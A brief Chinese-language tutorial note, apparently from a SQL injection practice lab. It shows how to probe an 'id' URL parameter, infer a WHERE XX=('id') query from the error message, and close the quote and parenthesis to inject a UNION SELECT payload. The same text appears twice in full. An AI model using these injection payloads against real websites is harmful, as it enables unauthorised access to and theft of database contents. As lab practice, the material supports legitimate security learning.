起手?id=1'给个参数看看反应
产生报错,关注后面的内容
//从报错信息中的''1'')就可以推断出SQL语句应该是WHERE XX=('id')
//那就需要考虑如何将 单引号和括号,提前关闭并且执行我们想要的语句就可以了
知道了语句,直接拼接
?id=1') and 1=2 union select 1,2,3%23
//使SQL语句变为WHERE XX=('1') and 1=2 union select 1,2,3#')
到这一步后面就一样了
起手?id=1'给个参数看看反应
产生报错,关注后面的内容
//从报错信息中的''1'')就可以推断出SQL语句应该是WHERE XX=('id')
//那就需要考虑如何将 单引号和括号,提前关闭并且执行我们想要的语句就可以了
知道了语句,直接拼接
?id=1') and 1=2 union select 1,2,3%23
//使SQL语句变为WHERE XX=('1') and 1=2 union select 1,2,3#')
到这一步后面就一样了